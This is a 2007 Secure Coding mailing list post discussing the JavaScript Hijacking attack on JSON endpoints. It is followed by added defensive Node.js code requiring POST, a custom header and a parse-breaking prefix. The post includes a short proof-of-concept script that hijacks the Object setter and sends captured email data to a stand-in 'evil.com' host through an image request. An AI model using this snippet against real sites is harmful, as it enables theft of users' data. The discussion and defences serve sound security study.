Secure Coding mailing list archives
JavaScript Hijacking
From: stefano.dipaola at wisec.it (Stefano Di Paola)
Date: Tue, 03 Apr 2007 18:30:11 +0200
Hi Brian, On Mon, 02/04/2007 at 12:13 -0700, Brian Chess wrote:
Hi Stefano, Yes, we are aware of your paper, but we intentionally chose to omit the reference because we are quite snobby. I'm joking!
:DD lol
The difference between what you discuss and JavaScript Hijacking is that we do not assume the presence of another defect. JavaScript Hijacking does not require the existence of a cross-site scripting vulnerability or the like. It's a new attack technique (and a new vulnerable code pattern), not a new method for exploiting an existing class of vulnerabilities.
Ok, I see the difference. You are taking advantage of a pure JSON CSRF with an evil script which contains a modified version of the Object prototype. And when the callback function is executed you use an XMLHttpRequest in order to send the information extracted by the instantiated object.

Well, I can see that you don't require an XSS vuln on a host, but you assume a vulnerability on a user who has to click on a link :)

Anyway, if there's an HTML injection on a 3rd site you could use an iframe with an evil page like the one you described without waiting for a user to click on an untrusted link. Or, if you can't use iframes, as XMLHttpRequest is restricted by same origin policy, you don't need an evil page since you could use an XSS vulnerable site as a vector in order to steal JSON information with an img tag.

--
<script>
function Object(){
  this.email setter = captureObject;
}
function captureObject(x){
  (new Image()).src='http:// evil. com/ collect?email='+x;
}
</script>
<script src='http:// vuln /json.js' ></script>
--

But this is just another way to accomplish your attack. BTW very nice paper!

Regards,
Stefano
Thanks, Brian
--
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer
Web: www.wisec.it
..................
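The thread shows the attack side only: a JSON endpoint that answers a cookie-authenticated GET with an array or object literal can be pulled in cross-site with a <script src> and read through a redefined Object/setter. The following is an added example, not code from the thread or from either author, of the two server-side controls that break that pattern, written as pure Node.js functions so they can be exercised without a server; the request shape (`{method, headers}`), the `X-Requested-With` header choice and the `)]}',` prefix are assumptions of this example.

```javascript
// Added example (not part of the thread): defences against loading a JSON
// endpoint as a cross-site <script>.
//  1. A <script src> (or <img src>) request cannot set custom headers and is
//     always a GET, so an endpoint that requires POST plus a custom header can
//     only be reached by same-origin XMLHttpRequest, the case Stefano notes
//     is bounded by the same-origin policy.
//  2. A prefix that is a syntax error as JavaScript but trivially stripped by
//     the legitimate XHR caller means that even a successful <script> load
//     fails at parse time, before any object literal is evaluated and before
//     a redefined Object constructor or setter could observe the data.

const JSON_PREFIX = ")]}',\n"; // assumption: any prefix that is not valid JS works

// Simulated server-side handler; `req` is a plain {method, headers} object.
function serveJson(req, data) {
  if (req.method !== 'POST') {
    return { status: 405, body: 'method not allowed' };
  }
  // Header names are compared lower-case, as Node's http module exposes them.
  if (req.headers['x-requested-with'] !== 'XMLHttpRequest') {
    return { status: 403, body: 'missing anti-hijacking header' };
  }
  return {
    status: 200,
    headers: { 'content-type': 'application/json' },
    body: JSON_PREFIX + JSON.stringify(data),
  };
}

// Legitimate same-origin client: strips the prefix, then parses as data.
function parseGuardedJson(body) {
  if (!body.startsWith(JSON_PREFIX)) {
    throw new Error('unexpected response format');
  }
  return JSON.parse(body.slice(JSON_PREFIX.length));
}

// Check used below: would this body be accepted as a script at all?
// A bare array literal is a valid script; the prefixed body is not.
function isValidScript(body) {
  try {
    new Function(body); // parse only, never executed
    return true;
  } catch (e) {
    return false;
  }
}
```

Run against a constructed record, the unprefixed array literal parses as a script while the prefixed response does not, and only the POST-with-header request gets a 200 at all.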